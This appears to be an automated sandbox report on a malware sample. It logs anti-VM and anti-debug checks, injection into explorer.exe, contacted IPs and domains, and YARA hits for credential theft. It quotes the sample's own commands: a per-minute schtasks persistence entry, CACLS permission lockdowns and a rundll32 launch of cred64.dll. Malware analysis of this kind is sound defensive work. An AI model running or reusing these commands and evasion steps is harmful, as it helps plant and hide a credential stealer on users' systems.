                              Source: C:\Users\user\AppData\Roaming\thgciciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\AppData\Roaming\thgciciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\AppData\Roaming\thgciciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\AppData\Roaming\thgciciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\AppData\Roaming\thgciciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Windows\explorer.exe TID: 848Thread sleep count: 656 > 30Jump to behavior
                              Source: C:\Windows\explorer.exe TID: 4496Thread sleep count: 1110 > 30Jump to behavior
                              Source: C:\Windows\explorer.exe TID: 4496Thread sleep time: -111000s >= -30000sJump to behavior
                              Source: C:\Windows\explorer.exe TID: 4836Thread sleep count: 1051 > 30Jump to behavior
                              Source: C:\Windows\explorer.exe TID: 4836Thread sleep time: -105100s >= -30000sJump to behavior
                              Source: C:\Windows\explorer.exe TID: 5312Thread sleep count: 553 > 30Jump to behavior
                              Source: C:\Windows\explorer.exe TID: 5324Thread sleep count: 917 > 30Jump to behavior
                              Source: C:\Windows\explorer.exe TID: 5324Thread sleep time: -91700s >= -30000sJump to behavior
                              Source: C:\Windows\explorer.exe TID: 5348Thread sleep count: 874 > 30Jump to behavior
                              Source: C:\Windows\explorer.exe TID: 5348Thread sleep time: -87400s >= -30000sJump to behavior
                              Source: C:\Windows\explorer.exe TID: 320Thread sleep count: 373 > 30Jump to behavior
                              Source: C:\Windows\explorer.exe TID: 6084Thread sleep count: 442 > 30Jump to behavior
                              Source: C:\Windows\explorer.exe TID: 6084Thread sleep time: -44200s >= -30000sJump to behavior
                              Source: C:\Windows\SysWOW64\explorer.exe TID: 2072Thread sleep count: 121 > 30Jump to behavior
                              Source: C:\Windows\SysWOW64\explorer.exe TID: 2072Thread sleep time: -121000s >= -30000sJump to behavior
                              Source: C:\Windows\explorer.exe TID: 684Thread sleep count: 105 > 30Jump to behavior
                              Source: C:\Windows\explorer.exe TID: 684Thread sleep time: -105000s >= -30000sJump to behavior
                              Source: C:\Windows\SysWOW64\explorer.exe TID: 3680Thread sleep count: 120 > 30Jump to behavior
                              Source: C:\Windows\SysWOW64\explorer.exe TID: 3680Thread sleep time: -120000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe TID: 2768Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe TID: 5044Thread sleep time: -50000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe TID: 240Thread sleep time: -360000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe TID: 3180Thread sleep time: -1440000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe TID: 2768Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Windows\explorer.exe TID: 3536Thread sleep count: 103 > 30Jump to behavior
                              Source: C:\Windows\explorer.exe TID: 3536Thread sleep time: -103000s >= -30000sJump to behavior
                              Source: C:\Windows\SysWOW64\explorer.exe TID: 2156Thread sleep count: 1280 > 30Jump to behavior
                              Source: C:\Windows\SysWOW64\explorer.exe TID: 2156Thread sleep time: -768000000s >= -30000sJump to behavior
                              Source: C:\Windows\SysWOW64\explorer.exe TID: 5540Thread sleep count: 151 > 30
                              Source: C:\Windows\SysWOW64\explorer.exe TID: 5540Thread sleep time: -151000s >= -30000s
                              Source: C:\Windows\SysWOW64\explorer.exe TID: 5716Thread sleep count: 149 > 30
                              Source: C:\Windows\SysWOW64\explorer.exe TID: 5716Thread sleep time: -149000s >= -30000s
                              Source: C:\Windows\explorer.exe TID: 5864Thread sleep count: 148 > 30
                              Source: C:\Windows\explorer.exe TID: 5864Thread sleep time: -148000s >= -30000s
                              Source: C:\Windows\SysWOW64\explorer.exe TID: 1164Thread sleep count: 146 > 30
                              Source: C:\Windows\SysWOW64\explorer.exe TID: 1164Thread sleep time: -146000s >= -30000s
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeLast function: Thread delayed
                              Source: C:\Windows\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeThread delayed: delay time: 180000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeThread delayed: delay time: 360000Jump to behavior
                              Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 600000Jump to behavior
                              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 656Jump to behavior
                              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1110Jump to behavior
                              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1051Jump to behavior
                              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 553Jump to behavior
                              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 917Jump to behavior
                              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 874Jump to behavior
                              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 373Jump to behavior
                              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 442Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeWindow / User API: foregroundWindowGot 1702Jump to behavior
                              Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 1280Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeAPI coverage: 4.9 %
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeThread delayed: delay time: 30000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeThread delayed: delay time: 50000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeThread delayed: delay time: 180000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeThread delayed: delay time: 360000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeThread delayed: delay time: 30000Jump to behavior
                              Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 600000Jump to behavior
                              Source: explorer.exe, 00000001.00000000.294760669.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
                              Source: gntuud.exe, 00000015.00000003.499375753.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000002.787565484.0000000000C39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWpn
                              Source: gntuud.exe, 00000015.00000002.785290818.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000003.499375753.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000002.787565484.0000000000C39000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000003.499661889.0000000000BF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: explorer.exe, 00000001.00000000.280449934.0000000007166000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
                              Source: explorer.exe, 00000001.00000000.294760669.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                              Source: explorer.exe, 00000001.00000000.294760669.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
                              Source: explorer.exe, 00000001.00000000.352809603.0000000008FE9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
                              Source: explorer.exe, 00000001.00000000.343444217.0000000005063000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
                              Source: explorer.exe, 00000001.00000000.352809603.0000000008FE9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                              Source: C:\Windows\explorer.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DD4D90 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,14_2_00DD4D90
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C2A284 FindFirstFileExW,12_2_00C2A284
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DF1396 FindFirstFileExW,14_2_00DF1396
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C2B3BA mov eax, dword ptr fs:[00000030h]12_2_00C2B3BA
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C20FDC mov eax, dword ptr fs:[00000030h]12_2_00C20FDC
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DEC0E1 mov eax, dword ptr fs:[00000030h]14_2_00DEC0E1
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DEE6F2 mov eax, dword ptr fs:[00000030h]14_2_00DEE6F2
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C1D7A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00C1D7A2
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C2D9C0 GetProcessHeap,12_2_00C2D9C0
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C17C6E SetUnhandledExceptionFilter,12_2_00C17C6E
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C177E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00C177E0
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C1D7A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00C1D7A2
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C17B0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00C17B0C
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DE8943 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00DE8943
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DE9247 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00DE9247
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DED260 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00DED260

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Source: C:\Windows\explorer.exeNetwork Connect: 31.41.244.228 80Jump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 62.204.41.79 80
                              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.3 80
                              Source: C:\Windows\explorer.exeDomain query: r3oidsofsios.com
                              Source: C:\Windows\explorer.exeDomain query: kikangalaassociates.com
                              Source: C:\Windows\explorer.exeFile created: thgcici.1.drJump to dropped file
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                              Source: C:\Users\user\AppData\Roaming\thgciciSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                              Source: C:\Users\user\AppData\Roaming\thgciciSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                              Source: C:\Users\user\AppData\Roaming\thgciciSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                              Source: C:\Users\user\AppData\Roaming\thgciciSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DD4070 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,14_2_00DD4070
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeThread created: C:\Windows\explorer.exe EIP: 5791A08Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\thgciciThread created: unknown EIP: 57E1A08Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\thgciciThread created: unknown EIP: 5851A08
                              Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: EDF380Jump to behavior
                              Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: EDF380Jump to behavior
                              Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: EDF380Jump to behavior
                              Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: EDF380Jump to behavior
                              Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: EDF380Jump to behavior
                              Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: EDF380Jump to behavior
                              Source: C:\Windows\explorer.exeMemory written: PID: 2096 base: EDF380 value: 90Jump to behavior
                              Source: C:\Windows\explorer.exeMemory written: PID: 3940 base: 7FF69FF38150 value: 90Jump to behavior
                              Source: C:\Windows\explorer.exeMemory written: PID: 1020 base: EDF380 value: 90Jump to behavior
                              Source: C:\Windows\explorer.exeMemory written: PID: 4044 base: 7FF69FF38150 value: 90Jump to behavior
                              Source: C:\Windows\explorer.exeMemory written: PID: 4696 base: EDF380 value: 90Jump to behavior
                              Source: C:\Windows\explorer.exeMemory written: PID: 5536 base: EDF380 value: 90Jump to behavior
                              Source: C:\Windows\explorer.exeMemory written: PID: 5692 base: EDF380 value: 90Jump to behavior
                              Source: C:\Windows\explorer.exeMemory written: PID: 5896 base: 7FF69FF38150 value: 90Jump to behavior
                              Source: C:\Windows\explorer.exeMemory written: PID: 1004 base: EDF380 value: 90Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeProcess created: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe "C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe" /FJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\2c33368f7d" /P "user:N"&&CACLS "..\2c33368f7d" /P "user:R" /E&&ExitJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll, MainJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /EJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\2c33368f7d" /P "user:N"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\2c33368f7d" /P "user:R" /EJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DD4480 ShellExecuteA,14_2_00DD4480
                              Source: explorer.exe, 00000001.00000000.340737155.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.312600735.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.274772666.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerT7<=ge
                              Source: explorer.exe, 00000001.00000000.353202489.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.340737155.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.312600735.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                              Source: explorer.exe, 00000001.00000000.340737155.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.312600735.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.274772666.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                              Source: explorer.exe, 00000001.00000000.339855935.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.274453869.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.312183179.0000000001378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CProgmanile
                              Source: explorer.exe, 00000001.00000000.340737155.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.312600735.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.274772666.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: EnumSystemLocalesW,12_2_00C2D0EA
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: EnumSystemLocalesW,12_2_00C2D09F
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: EnumSystemLocalesW,12_2_00C2D185
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: EnumSystemLocalesW,12_2_00C25241
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_00C2D210
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: GetLocaleInfoW,12_2_00C2D463
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_00C2D589
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: GetLocaleInfoW,12_2_00C2D68F
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_00C2D75E
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: GetLocaleInfoW,12_2_00C25763
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,12_2_00C2CDFD
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C17D75 cpuid 12_2_00C17D75
                              Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C179FF GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,12_2_00C179FF
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DF53B4 _free,_free,_free,GetTimeZoneInformation,_free,14_2_00DF53B4
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DE4010 Sleep,IsUserAnAdmin,GetUserNameA,GetComputerNameExW,GetModuleFileNameA,14_2_00DE4010
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DD4D90 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,14_2_00DD4D90

                              Stealing of Sensitive Information

                              barindex
                              Source: Yara matchFile source: 14.0.9545.exe.dd0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 44.2.gntuud.exe.f00000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.0.9545.exe.dd0000.3.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.2.9545.exe.dd0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 44.0.gntuud.exe.f00000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 21.0.gntuud.exe.f00000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 21.2.gntuud.exe.f00000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.0.9545.exe.dd0000.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 29.2.gntuud.exe.f00000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.0.9545.exe.dd0000.2.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 29.0.gntuud.exe.f00000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000001D.00000000.425029230.0000000000F01000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001D.00000002.428729367.0000000000F01000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000E.00000000.403627141.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000015.00000000.417948151.0000000000F01000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000002C.00000000.541818627.0000000000F01000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000E.00000000.403992347.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000E.00000000.402947790.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000002C.00000002.547069275.0000000000F01000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
